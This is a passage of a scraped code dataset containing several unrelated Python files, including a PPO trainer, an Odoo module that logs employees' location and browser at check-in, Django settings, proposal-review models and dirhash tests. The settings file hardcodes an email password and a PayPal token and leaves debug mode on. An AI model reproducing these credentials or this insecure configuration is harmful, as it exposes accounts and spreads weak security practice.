old_actions = torch.stack(mem_actions[start_idx:end_idx])\n old_log_probs = torch.stack(mem_log_probs[start_idx:end_idx])\n old_availables = torch.stack(mem_availables[start_idx:end_idx])\n rewards_tensor = torch.tensor(mem_rewards[start_idx:end_idx])\n\n if self.args.mode == 'gpu':\n old_states_for_action.cuda()\n old_states_for_value.cuda()\n old_actions = old_actions.cuda()\n old_log_probs = old_log_probs.cuda()\n old_availables = old_availables.cuda()\n rewards_tensor = rewards_tensor.cuda()\n\n # Evaluating old actions and values\n log_probs, state_values, dist_entropy = self.policy.evaluate(old_states_for_action,\n old_states_for_value, old_actions,\n old_availables)\n\n # Probability ratio between the old and the new policies\n ratios = torch.exp(log_probs - old_log_probs.detach())\n\n # Advantage function\n advantages = rewards_tensor - state_values.detach()\n\n # PPO loss value\n surrogate_1 = ratios * advantages\n surrogate_2 = torch.clamp(ratios, 1 - self.args.eps_clip, 1 + self.args.eps_clip) * advantages\n\n loss = - torch.min(surrogate_1, surrogate_2) + 0.5 * self.MseLoss(state_values, rewards_tensor) \\\n - self.args.entropy_value * dist_entropy\n\n self.optimizer.zero_grad()\n\n loss.mean().backward()\n\n self.optimizer.step()\n\n # Copy new weights into old policy\n self.policy_old.load_state_dict(self.policy.state_dict())\n\n def save(self, folder, filename):\n \"\"\"\n Save the model\n :param folder: Folder requested\n :param filename: file name requested\n \"\"\"\n\n filepath = os.path.join(folder, filename)\n\n if not os.path.exists(folder):\n os.mkdir(folder)\n torch.save(self.policy_old.state_dict(), filepath)\n","sub_path":"src/problem/portfolio/learning/brain_ppo.py","file_name":"brain_ppo.py","file_ext":"py","file_size_in_byte":4398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"354391455","text":"# -*- coding: utf-8 -*-\n#################################################################################\n# Author : Acespritech Solutions Pvt. Ltd. (<www.acespritech.com>)\n# Copyright(c): 2012-Present Acespritech Solutions Pvt. Ltd.\n# All Rights Reserved.\n#\n# This program is copyright property of the author mentioned above.\n# You can`t redistribute it and/or modify it.\n#\n#################################################################################\n\n\nfrom odoo import fields, models, api, _, exceptions\nfrom odoo.http import request\nfrom datetime import datetime\nimport logging, requests, platform\nimport httpagentparser\n_logger = logging.getLogger(__name__)\n\n\nclass ResConfigSettings(models.TransientModel):\n _inherit = 'res.config.settings'\n\n google_api_key = fields.Char(string='Google API KEY')\n\n @api.model\n def get_values(self):\n res = super(ResConfigSettings, self).get_values()\n res.update(google_api_key=self.env['ir.config_parameter'].sudo().get_param('aspl_employee_attendance_map.google_api_key'))\n return res\n\n @api.multi\n def set_values(self):\n super(ResConfigSettings, self).set_values()\n self.env['ir.config_parameter'].sudo().set_param('aspl_employee_attendance_map.google_api_key', self.google_api_key)\n\n\nclass HrAttendance(models.Model):\n _inherit = 'hr.attendance'\n\n location_name = fields.Char(string=\"Location Name\")\n latitude = fields.Char(string=\"latitude\")\n longitude = fields.Char(string=\"Logitude\")\n os_name = fields.Char(string=\"Operationg System\")\n browser_name = fields.Char(string=\"Browser\")\n\n\nclass HrEmployee(models.Model):\n _inherit = 'hr.employee'\n\n @api.multi\n def attendance_manual(self, next_action, entered_pin=None, latitude=None, longitude=None):\n return self.attendance_action(next_action, entered_pin, latitude, longitude)\n\n @api.multi\n def attendance_action(self, next_action, entered_pin=None, latitude=None, longitude=None):\n self.ensure_one()\n action_message = self.env.ref('hr_attendance.hr_attendance_action_greeting_message').read()[0]\n action_message['previous_attendance_change_date'] = self.last_attendance_id and (\n self.last_attendance_id.check_out or self.last_attendance_id.check_in) or False\n action_message['employee_name'] = self.name\n action_message['next_action'] = next_action\n if self.user_id:\n modified_attendance = self.sudo(self.user_id.id).attendance_action_change(latitude, longitude)\n else:\n modified_attendance = self.sudo().attendance_action_change(latitude, longitude)\n action_message['attendance'] = modified_attendance.read()[0]\n return {'action': action_message}\n\n @api.multi\n def attendance_action_change(self, latitude=None, longitude=None):\n \"\"\" Check In/Check Out action\n Check In: create a new attendance record\n Check Out: modify check_out field of appropriate attendance record\n \"\"\"\n if len(self) > 1:\n raise exceptions.UserError(_('Cannot perform check in or check out on multiple employees.'))\n action_date = fields.Datetime.now()\n agent = request.httprequest.environ.get('HTTP_USER_AGENT')\n agent_details = httpagentparser.detect(agent)\n user_os = agent_details['os']['name']\n browser_name = agent_details['browser']['name']\n bit_type = platform.architecture()\n key = self.env['ir.config_parameter'].sudo().get_param('aspl_employee_attendance_map.google_api_key')\n api_response = requests.get(\n 'https://maps.googleapis.com/maps/api/geocode/json?latlng=%s,%s&key=%s' % (latitude, longitude, key))\n api_response_dict = api_response.json()\n if self.attendance_state != 'checked_in':\n vals = {\n 'employee_id': self.id,\n 'check_in': action_date\n }\n if latitude and longitude:\n if api_response_dict['status'] == 'OK':\n vals.update({\n 'longitude': longitude,\n 'latitude': latitude,\n 'os_name': user_os + \", \" + bit_type[0],\n 'browser_name': browser_name,\n 'location_name': api_response_dict['results'][0]['formatted_address'],\n })\n return self.env['hr.attendance'].create(vals)\n else:\n return self.env['hr.attendance'].create(vals)\n else:\n attendance = self.env['hr.attendance'].search([('employee_id', '=', self.id), ('check_out', '=', False)], limit=1)\n if attendance:\n attendance.check_out = action_date\n else:\n raise exceptions.UserError(('Cannot perform check out on %(empl_name)s, could not find corresponding check in. '\n 'Your attendances have probably been modified manually by human resources.') % {\n 'empl_name': self.name, })\n return attendance\n\n\nclass EmployeeAttendanceMap(models.Model):\n _name = 'employee.attendance.map'\n\n employee_ids = fields.Many2many('hr.employee', string=\"Employees\")\n attendance_date = fields.Date(string=\"Date\", required=True)\n department_id = fields.Many2one('hr.department', string=\"Department\")\n job_position = fields.Many2one('hr.job', string=\"Job Position\")\n\n @api.multi\n def show_map(self):\n try:\n response = requests.get(\"http://www.google.com\")\n check_connection = True\n except requests.ConnectionError:\n check_connection = False\n attendance_obj = self.env['hr.attendance']\n result = []\n result.append({'connection': check_connection})\n\n domain = []\n if self.employee_ids:\n domain += [('id', 'in', self.employee_ids.ids)]\n if self.department_id:\n domain += [('department_id', '=', self.department_id.id)]\n if self.job_position:\n domain += [('job_id', '=', self.job_position.id)]\n employee_ids = self.env['hr.employee'].search(domain)\n if employee_ids:\n emp_detail = attendance_obj.search([('employee_id', 'in', employee_ids.ids)])\n for each_emp in emp_detail:\n emp_date = datetime.strptime(str(each_emp.check_in), '%Y-%m-%d %H:%M:%S')\n select_date = datetime.strptime(str(self.attendance_date), '%Y-%m-%d')\n new_emp_date = datetime.date(emp_date)\n new_select_date = datetime.date(select_date)\n if new_emp_date == new_select_date:\n result.append({'latitude': each_emp.latitude,\n 'longitude': each_emp.longitude,\n 'os_name': each_emp.os_name,\n 'name': each_emp.employee_id.name,\n 'emp_id': each_emp.employee_id.id,\n 'image': each_emp.employee_id.image,\n 'date': self.attendance_date,\n 'dept_id': self.department_id.id,\n 'job_position': self.job_position.id\n })\n else:\n continue\n return result\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n","sub_path":"addons/aspl_employee_attendance_map/models/hr_attendance.py","file_name":"hr_attendance.py","file_ext":"py","file_size_in_byte":7461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"613405510","text":"# -*- encoding: utf-8 -*-\n\nimport os\nbase_path = os.path.join(os.path.abspath(os.path.dirname(__file__)), os.path.pardir)\n\nfrom django.conf import global_settings\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nWEBSITE_NAME = 'OpenReader'\nWEBSITE_DOMAIN = 'http://127.0.0.1:8000'\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'openreader',\n 'USER': 'openreader',\n 'PASSWORD': 'openreader',\n 'HOST': '',\n 'PORT': '',\n }\n}\n\nADMINS = ()\nMANAGERS = ADMINS\n\nTIME_ZONE = 'Asia/Bangkok'\nLANGUAGE_CODE = 'th'\n\ngettext = lambda s: s\nLANGUAGES = (\n ('en', gettext('English')),\n ('th', gettext('Thai')),\n)\n\nLOCALE_PATHS = (\n os.path.join(base_path, 'locale'),\n)\n\nSITE_ID = 1\n\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n\nMEDIA_ROOT = os.path.join(base_path, 'media/')\nMEDIA_URL = '/media/'\n\nSTATIC_ROOT = os.path.join(base_path, 'sitestatic/')\nSTATIC_URL = '/static/'\n\nSTATICFILES_DIRS = (\n os.path.join(base_path, 'static'),\n)\n\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n # 'django.contrib.staticfiles.finders.DefaultStorageFinder',\n)\n\nCACHES = {\n 'default': {\n 'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache',\n 'LOCATION': os.path.join(base_path, 'media/cache/'),\n }\n}\n\nSECRET_KEY = 'THIS IS A SECRET KEY'\n\nAUTH_PROFILE_MODULE = 'domain.UserProfile'\nLOGIN_REDIRECT_URL = '/'\n\nAUTHENTICATION_BACKENDS = (\n 'openreader.backends.EmailAuthenticationBackend',\n 'openreader.backends.InvitationAuthenticationBackend',\n 'django.contrib.auth.backends.RemoteUserBackend',\n 'django.contrib.auth.backends.ModelBackend',\n )\n\nFILE_UPLOAD_HANDLERS = ('openreader.handlers.UploadProgressCachedHandler', ) + global_settings.FILE_UPLOAD_HANDLERS\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n # 'django.template.loaders.eggs.Loader',\n)\n\nROOT_URLCONF = 'openreader.urls'\nWSGI_APPLICATION = 'openreader.wsgi.application'\n\nTEMPLATE_DIRS = (\n os.path.join(base_path, 'templates'),\n)\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n 'django.contrib.auth.context_processors.auth',\n 'django.core.context_processors.debug',\n 'django.core.context_processors.i18n',\n 'django.core.context_processors.media',\n 'django.core.context_processors.static',\n 'django.contrib.messages.context_processors.messages',\n 'django.core.context_processors.request',\n 'openreader.context.constants',\n)\n\nMIDDLEWARE_CLASSES = (\n 'openreader.middleware.AJAXSimpleExceptionResponse',\n 'openreader.http.Http403Middleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.locale.LocaleMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.transaction.TransactionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.RemoteUserMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n\n 'pagination.middleware.PaginationMiddleware',\n 'debug_toolbar.middleware.DebugToolbarMiddleware',\n)\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n\n 'private_files',\n\n 'pagination',\n 'debug_toolbar',\n 'djcelery',\n 'djkombu',\n 'paypal.standard.pdt',\n \n 'accounts',\n 'domain',\n 'presentation',\n\n 'api',\n 'common',\n 'management',\n)\n\nOPENREADER_LOGGER = 'openreader'\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': True,\n 'formatters': {\n 'default': {\n 'format': '%(levelname)s %(asctime)s %(filename)s:%(lineno)d %(message)s'\n }\n },\n 'handlers': {\n 'file': {\n 'class': 'logging.FileHandler',\n 'filename': MEDIA_ROOT + '/openreader.log',\n 'formatter':'default'\n }\n },\n 'loggers': {\n OPENREADER_LOGGER: {\n 'handlers': ['file'],\n 'level': 'DEBUG'\n },\n }\n}\n\n# Email\n\n#EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\nEMAIL_DOMAIN_NAME = 'localhost'\n\nEMAIL_USE_TLS = True\nEMAIL_HOST = 'smtp.gmail.com'\nEMAIL_HOST_USER = 'application.testbed@gmail.com'\nEMAIL_HOST_PASSWORD = 'opendreamqwer'\nEMAIL_PORT = 587\n\nEMAIL_ADDRESS_NO_REPLY = 'noreply@' + EMAIL_DOMAIN_NAME\n\n########## Django Debug Toolbar ##########\n\nINTERNAL_IPS = ('127.0.0.1',)\nDEBUG_TOOLBAR_CONFIG = {\n 'INTERCEPT_REDIRECTS': False,\n }\n\n########## Django Celery ##########\n\nimport djcelery\ndjcelery.setup_loader()\n\n# BROKER_URL = \"redis://localhost:6379/0\"\n\n# BROKER_HOST = \"localhost\"\n# BROKER_PORT = 5672\n# BROKER_USER = \"guest\"\n# BROKER_PASSWORD = \"guest\"\n# BROKER_VHOST = \"/\"\n\n# BROKER_TRANSPORT = 'redis'\n\nBROKER_BACKEND = \"djkombu.transport.DatabaseTransport\"\n#celery\nBROKER_HOST = \"localhost\"\nBROKER_PORT = 5672\nBROKER_USER = \"guest\"\nBROKER_PASSWORD = \"guest\"\nBROKER_VHOST = \"/\"\n\nfrom celery.schedules import crontab\nfrom datetime import timedelta\nfrom domain import tasks\n\nTEST_PAYMENT_REMIND_EVERY_HOUR = False\n\nCELERYBEAT_SCHEDULE = {\n 'decide-on-first-month-everydays': {\n 'task': 'tasks.send_notification_email_to_decide_on_first_month',\n 'schedule': crontab(hour=0, minute=0),\n },\n # 'decide-on-first-month-test-every-10-seconds': {\n # 'task': 'tasks.send_notification_email_to_decide_on_first_month',\n # 'schedule': timedelta(seconds=30),\n # },\n 'pay-service-everydays': {\n 'task': 'tasks.send_notification_email_to_pay_service',\n 'schedule': crontab(hour=0, minute=0),\n },\n}\n\nif TEST_PAYMENT_REMIND_EVERY_HOUR:\n CELERYBEAT_SCHEDULE.update({\n 'pay-service-test-everyhour': {\n 'task': 'tasks.send_notification_email_to_pay_service',\n 'schedule': crontab(hour='*/1', minute=0),\n },\n })\n\n########## Django Private Files ##########\n\nFILE_PROTECTION_METHOD = 'basic'\n\n########## Django Pagination ##########\n\nPAGINATION_DEFAULT_PAGINATION = 50\n\n########## Open Reader Settings ##########\n\nPUBLICATION_PREFIX = '/publication'\nPUBLICATION_ROOT = MEDIA_ROOT + PUBLICATION_PREFIX\n\nMAX_PUBLICATION_FILE_SIZE = 300000000 # 300mb\nMAX_PUBLICATION_FILE_SIZE_TEXT = '300 เมกะไบต์'\n\n# Publication Download\n\nDOWNLOAD_LINK_EXPIRE_IN = 180 # Minutes\n\n# Thumbnail\nTHUMBNAIL_ROOT = PUBLICATION_ROOT + '/thumbnails'\nTHUMBNAIL_TEMP_ROOT = MEDIA_ROOT + '/thumbnails_temp' # Use when generating thumbnails\nTHUMBNAIL_URL = MEDIA_URL + '/publication/thumbnails'\n\nTHUMBNAIL_SIZES = (\n ('small', (70, 85)),\n ('large', (200, 250)),\n)\n\n# Set to False if server can generate thumbnail 99%\nTHUMBNAIL_REGENERATE = True\n\n# Shelf Icons\nDEFAULT_SHELF_ICON = 'basic1-006'\nSHELF_ICONS = ['basic1-006', 'basic1-041', 'basic1-049', 'basic1-052', 'basic1-054', 'basic1-106', 'basic1-129', 'basic2-001', 'basic2-011', 'basic2-018', 'basic2-057', 'basic2-092', 'basic2-096', 'basic2-102', 'basic2-106', 'basic2-114', 'basic2-117', 'basic2-142', 'basic2-197', 'basic2-238', 'basic2-253', 'basic2-256', 'basic2-258', 'basic2-267', 'basic2-268']\n\n# PAYPAL\nPAYPAL_IDENTITY_TOKEN = 'vhk6xm8LOT2JL_VLuisFQaxam5Ox764-02gQu7hg2SwZDBOUxnQ6CUHqJLO'\nPAYPAL_RECEIVER_EMAIL = 'kengggg@gmail.com'\n\n#######################################################\n\ntry:\n from settings_local import *\nexcept ImportError:\n pass\n","sub_path":"openreader/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":7701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"438729622","text":"#-*- encoding=utf-8 -*-\nimport sys\nimport database\nimport netutils\nimport parserutils\n\ndef TestParserUtils():\n session = requests.Session()\n with open('resources/headers.json', 'r', 1) as f:\n session.headers = json.load(f)\n\n homeDownloaderSrc = queue.Queue()\n homeDownloaderLock = threading.Lock()\n\n homeParserSrc = queue.Queue()\n homeParserLock = threading.Lock()\n\n followeeDownloaderSrc = queue.Queue()\n followeeDownloaderLock = threading.Lock()\n\n followeeParserSrc = queue.Queue()\n followeeParserLock = threading.Lock()\n\n followerDownloaderSrc = queue.Queue()\n followerDownloaderLock = threading.Lock()\n\n followerParserSrc = queue.Queue()\n followerParserLock = threading.Lock()\n\n homeDownloader = netutils.HomeDownloader(session, homeDownloaderSrc, homeDownloaderLock, homeParserSrc, homeParserLock)\n followeeDownloader = netutils.FolloweeDownloader(session, followeeDownloaderSrc, followeeDownloaderLock, followeeParserSrc, followeeParserLock)\n followerDownloader = netutils.FollowerDownloader(session, followerDownloaderSrc, followerDownloaderLock, followerParserSrc, followerParserLock)\n\n homeParser = parserutils.HomeParser()\n user = homeParser.Get('resources/test/170c887a6f061c0454e7bfc1def7d1ab.home.html')\n for key in user.keys():\n print('%20s: %s' % (key, user[key]))\n\n followeeParser = parserutils.FolloweeParser()\n followee = followeeParser.Get('resources/test/170c887a6f061c0454e7bfc1def7d1ab.followee.html')\n print(len(followee), ': ', followee); print()\n\n followerParser = parserutils.FollowerParser()\n follower = followerParser.Get('resources/test/170c887a6f061c0454e7bfc1def7d1ab.follower.html')\n print(len(follower), ': ', follower); print()\n\nif __name__ == '__main__':\n TestParserUtils()\n","sub_path":"source/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"342990096","text":"from django.contrib.auth.models import User\nfrom django.core.mail import send_mass_mail\nfrom django.db import models\nfrom django.template import Context, Template\n\nfrom symposion.markdown_parser import parse\n\n\nclass ProposalVote(models.Model):\n \"\"\"\n Model to track votes made on a proposal.\n\n This model replaces symposion.reviews.models.Comment,\n symposion.reviews.models.Review, and symposion.reviews.models.LatestVote.\n\n Fields:\n proposal - The proposal associated with this vote.\n voter - The user that made the vote.\n score - The user's vote, represented as two characters.\n comment - The Markdown-formatted text of the vote's comment (optional).\n comment_html - An autogenerated HTML version of the vote's comment.\n date_created - The date/time that the vote was created.\n date_modified - The date/time that the vote was last modified.\n \"\"\"\n\n # These values are based on the historical ones found in\n # symposion.reviews.models.score_expression().\n # This allows us to use integers directly which makes\n # calculating scores easier.\n PLUS_ONE = 3\n PLUS_ZERO = 1\n MINUS_ZERO = -1\n MINUS_ONE = -3\n SCORES = [\n (\n PLUS_ONE,\n \"+1 — Good proposal and I will argue for it to be accepted.\",\n ),\n (\n PLUS_ZERO,\n \"+0 — OK proposal, but I will not argue for it to be accepted.\",\n ),\n (\n MINUS_ZERO,\n \"−0 — Weak proposal, but I will not argue against acceptance.\",\n ),\n (\n MINUS_ONE,\n \"−1 — Serious issues and I will argue to reject this proposal.\",\n ),\n ]\n\n proposal = models.ForeignKey(\n \"proposals.Proposal\",\n on_delete=models.CASCADE,\n related_name=\"review_votes\",\n )\n voter = models.ForeignKey(\n User, on_delete=models.CASCADE, related_name=\"review_votes\"\n )\n score = models.SmallIntegerField(blank=True, choices=SCORES)\n comment = models.TextField(blank=True)\n comment_html = models.TextField(blank=True, editable=False)\n date_created = models.DateTimeField(auto_now_add=True)\n date_modified = models.DateTimeField(auto_now=True)\n\n def save(self, *args, **kwargs):\n self.comment_html = parse(self.comment)\n return super(ProposalVote, self).save(*args, **kwargs)\n\n def get_numeric_score_display(self):\n \"\"\"Returns numeric value at beginning of score display string.\"\"\"\n return self.get_score_display()[0:2].strip()\n\n\ndef proposalvote_score_cache_key(proposal, voter):\n \"\"\"\n Return the cache key for a ProposalVote's score\n based on the proposal and voting user.\n \"\"\"\n return \"proposalvote_{}_{}_score\".format(proposal.pk, voter.pk)\n\n\nclass ProposalFeedback(models.Model):\n proposal = models.ForeignKey(\n \"proposals.Proposal\",\n on_delete=models.CASCADE,\n related_name=\"review_feedback\",\n )\n author = models.ForeignKey(\n User, on_delete=models.CASCADE, related_name=\"review_feedback\"\n )\n comment = models.TextField(blank=True)\n comment_html = models.TextField(blank=True, editable=False)\n date_created = models.DateTimeField(auto_now_add=True)\n date_modified = models.DateTimeField(auto_now=True)\n\n def save(self, *args, **kwargs):\n self.comment_html = parse(self.comment)\n return super(ProposalFeedback, self).save(*args, **kwargs)\n\n\nclass ProposalResult(models.Model):\n \"\"\"\n Model to track whether a proposal's acceptance and notification status.\n\n This model replaces symposion.reviews.models.ProposalResult and\n symposion.reviews.models.ResultNotification.\n \"\"\"\n\n RESULT_ACCEPTED = \"A\"\n RESULT_REJECTED = \"R\"\n RESULT_STANDBY = \"S\"\n RESULT_UNDECIDED = \"U\"\n\n RESULT_STATUSES = [\n (RESULT_UNDECIDED, \"Undecided\"),\n (RESULT_ACCEPTED, \"Accepted\"),\n (RESULT_REJECTED, \"Rejected\"),\n (RESULT_STANDBY, \"Standby\"),\n ]\n\n proposal = models.OneToOneField(\n \"proposals.Proposal\",\n on_delete=models.CASCADE,\n related_name=\"review_result\",\n )\n status = models.CharField(\n choices=RESULT_STATUSES, default=RESULT_UNDECIDED, max_length=1\n )\n\n\nclass ProposalNotification(models.Model):\n \"\"\"Model to track notifications sent to proposal speakers.\"\"\"\n\n from_address = models.EmailField()\n subject = models.CharField(max_length=254)\n body = models.TextField()\n proposals = models.ManyToManyField(\n \"proposals.Proposal\",\n blank=True,\n related_name=\"review_notifications\",\n )\n date_sent = models.DateTimeField(\n verbose_name=\"Date this notification was created and sent\",\n auto_now_add=True,\n )\n\n def __str__(self):\n return \"{}\".format(self.subject)\n\n def send_email(self):\n \"\"\"Returns a list of speakers without email addresses.\"\"\"\n email_messages = []\n unemailed = []\n # Create a message for each email address.\n # This is necessary because we are not using BCC.\n for proposal in self.proposals.all():\n # In order to support the \"variable substitution\"\n # supported by the previous reviews system, the\n # message needs to be templated anew for each\n # proposal.\n message_body = Template(self.body).render(\n Context({\"proposal\": proposal.notification_email_context()})\n )\n for speaker in proposal.speakers():\n if speaker.email:\n datamessage_tuple = (\n self.subject,\n message_body,\n self.from_address,\n [speaker.email],\n )\n email_messages.append(datamessage_tuple)\n else:\n unemailed.append(speaker)\n send_mass_mail(email_messages)\n return unemailed\n","sub_path":"conf_site/reviews/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"345737809","text":"class Solution:\n # APP1: like fibonicci sequence. use recursion(dfs)\n # Time: O(2^n) Space: O(1) Runtime: TLE\n # def climbStairs(self, n: int) -> int:\n # if not n or n < 0:\n # return 0\n # if n <= 2:\n # return n\n # return self.climbStairs(n - 1) + self.climbStairs(n - 2)\n\n # APP2: optimize APP1: dfs + memoization\n # Time: O(n) space: O(n) Runtime: 71% memory: 6%\n # def climbStairs(self, n: int) -> int:\n # if not n or n < 0:\n # return 0\n # if n <= 2:\n # return n\n # memo = {1: 1, 2: 2}\n # return self.dfs(n, memo)\n\n # def dfs(self, n, memo):\n # if n in memo:\n # return memo[n]\n # memo[n] = self.dfs(n - 1, memo) + self.dfs(n - 2, memo)\n # return memo[n]\n\n # APP3: DP. Define f[i]: distinct ways to reach ith stairs.\n # f[i] = f[i - 1] + f[i - 2]. ans = f[n - 1]\n # Time: O(n) Space: O(n) Runtime: 98% memory:6%\n # def climbStairs(self, n: int) -> int:\n # if not n or n < 0:\n # return 0\n # if n <= 2:\n # return n\n # f = [1, 2] + [0] * (n - 2)\n # for i in range(2, n):\n # f[i] = f[i -1] + f[i - 2]\n # return f[n - 1]\n\n # APP4: optimize APP3. we only need to know the state of i - 1 and i - 2. Two variables will do\n # Time: O(n) Space: O(1) Runtime: 98% Memory:6%\n def climbStairs(self, n: int) -> int:\n if not n or n < 0:\n return 0\n if n <= 2:\n return n\n a, b = 1, 2\n for i in range(2, n):\n c = a + b\n a, b = b, c\n return c\n","sub_path":"DP/2. Sequence DP/70. Climbing Stairs.py","file_name":"70. Climbing Stairs.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"203766131","text":"from __future__ import print_function, division\n\nimport os\nimport shutil\nimport hashlib\nimport tempfile\nfrom time import sleep, time\n\nimport pytest\nfrom pathspec import RecursionError\n\nfrom dirhash import (\n _get_hasher_factory,\n _get_match_spec,\n get_included_paths,\n dirhash,\n algorithms_available,\n algorithms_guaranteed,\n _empty_dir_descriptor\n)\n\n\nclass TestGetHasherFactory(object):\n\n def test_get_guaranteed(self):\n algorithm_and_hasher_factory = [\n ('md5', hashlib.md5),\n ('sha1', hashlib.sha1),\n ('sha224', hashlib.sha224),\n ('sha256', hashlib.sha256),\n ('sha384', hashlib.sha384),\n ('sha512', hashlib.sha512)\n ]\n assert algorithms_guaranteed == {a for a, _ in algorithm_and_hasher_factory}\n for algorithm, expected_hasher_factory in algorithm_and_hasher_factory:\n hasher_factory = _get_hasher_factory(algorithm)\n assert hasher_factory == expected_hasher_factory\n\n def test_get_available(self):\n for algorithm in algorithms_available:\n hasher_factory = _get_hasher_factory(algorithm)\n hasher = hasher_factory()\n assert hasattr(hasher, 'update')\n assert hasattr(hasher, 'hexdigest')\n\n def test_not_available(self):\n with pytest.raises(ValueError):\n _get_hasher_factory('not available')\n\n def test_bypass_hasher_factory(self):\n\n # test standard hasher\n hasher_factory = _get_hasher_factory(hashlib.sha256)\n assert hasher_factory is hashlib.sha256\n\n # test raise on custom hasher with bad interface\n class IncompleteMockHasher(object):\n\n def __init__(self, *args, **kwargs):\n pass\n\n def update(self, *args, **kwargs):\n pass\n\n with pytest.raises(ValueError):\n _get_hasher_factory(IncompleteMockHasher)\n\n # test custom hasher with ok interface\n class MockHasher(IncompleteMockHasher):\n\n def hexdigest(self):\n return ''\n\n hasher_factory = _get_hasher_factory(MockHasher)\n assert hasher_factory is MockHasher\n\n\nclass TestGetMatchSpec(object):\n\n def test_default_match_all(self):\n ms = _get_match_spec()\n assert ms == ['*']\n\n def test_only_match(self):\n ms = _get_match_spec(match=['a*', 'b*'])\n assert ms == ['a*', 'b*']\n\n def test_only_ignore(self):\n ms = _get_match_spec(ignore=['a*', 'b*'])\n assert ms == ['*', '!a*', '!b*']\n\n def test_match_and_ignore(self):\n ms = _get_match_spec(match=['a*'], ignore=['*.ext'])\n assert ms == ['a*', '!*.ext']\n\n def test_ignore_hidden(self):\n ms = _get_match_spec(ignore_hidden=True)\n assert ms == ['*', '!.*', '!.*/']\n\n # should not duplicate if present in (general) ignore\n ms = _get_match_spec(ignore=['.*'], ignore_hidden=True)\n assert ms == ['*', '!.*', '!.*/']\n\n ms = _get_match_spec(ignore=['.*/'], ignore_hidden=True)\n assert ms == ['*', '!.*/', '!.*']\n\n ms = _get_match_spec(ignore=['.*', '.*/'], ignore_hidden=True)\n assert ms == ['*', '!.*', '!.*/']\n\n def test_ignore_extensions(self):\n ms = _get_match_spec(ignore_extensions=['.ext'])\n assert ms == ['*', '!*.ext']\n\n # automatically adds '.'\n ms = _get_match_spec(ignore_extensions=['ext'])\n assert ms == ['*', '!*.ext']\n\n # mixed also works\n ms = _get_match_spec(ignore_extensions=['ext1', '.ext2'])\n assert ms == ['*', '!*.ext1', '!*.ext2']\n\n # should not duplicate if present in (general) ignore\n ms = _get_match_spec(ignore=['*.ext'], ignore_extensions=['.ext'])\n assert ms == ['*', '!*.ext']\n\n ms = _get_match_spec(ignore=['*.ext'], ignore_extensions=['ext'])\n assert ms == ['*', '!*.ext']\n\n\nclass TempDirTest(object):\n\n def setup(self):\n self.dir = tempfile.mkdtemp()\n\n def tear_down(self):\n if os.path.exists(self.dir):\n shutil.rmtree(self.dir)\n\n def path_to(self, relpath):\n return os.path.join(self.dir, relpath)\n\n def mkdirs(self, dirpath):\n os.makedirs(self.path_to(dirpath))\n\n def mkfile(self, relpath, content=None):\n with open(self.path_to(relpath), 'w') as f:\n if content:\n f.write(content)\n\n def symlink(self, src, dst):\n os.symlink(self.path_to(src), self.path_to(dst))\n\n def remove(self, relpath):\n if os.path.isdir(self.path_to(relpath)):\n shutil.rmtree(self.path_to(relpath))\n os.remove(self.path_to(relpath))\n\n\nclass TestGetIncludedPaths(TempDirTest):\n # Integration tests with `pathspec` for basic use cases.\n\n def test_basic(self):\n self.mkdirs('root/d1/d11')\n self.mkdirs('root/d2')\n\n self.mkfile('root/f1')\n self.mkfile('root/d1/f1')\n self.mkfile('root/d1/d11/f1')\n self.mkfile('root/d2/f1')\n\n expected_filepaths = ['d1/d11/f1', 'd1/f1', 'd2/f1', 'f1']\n filepaths = get_included_paths(self.path_to('root'))\n assert filepaths == expected_filepaths\n\n # end with '/' or not should not matter\n filepaths = get_included_paths(self.path_to('root/'))\n assert filepaths == expected_filepaths\n\n def test_not_a_directory(self):\n self.mkdirs('root')\n self.mkfile('root/f1')\n # does not exist\n with pytest.raises(ValueError):\n get_included_paths(self.path_to('wrong_root'))\n with pytest.raises(ValueError):\n get_included_paths(self.path_to('root/f1'))\n\n def test_symlinked_file(self):\n self.mkdirs('root')\n self.mkfile('root/f1')\n self.mkfile('linked_file')\n self.symlink('linked_file', 'root/f2')\n\n # NOTE `follow_links` hash no effect if only the file is linked (as is the\n # case here), linked _files_ are always included.\n filepaths = get_included_paths(self.path_to('root'), follow_links=False)\n assert filepaths == ['f1', 'f2']\n\n filepaths = get_included_paths(self.path_to('root'), follow_links=True)\n assert filepaths == ['f1', 'f2']\n\n def test_symlinked_dir(self):\n self.mkdirs('root')\n self.mkfile('root/f1')\n 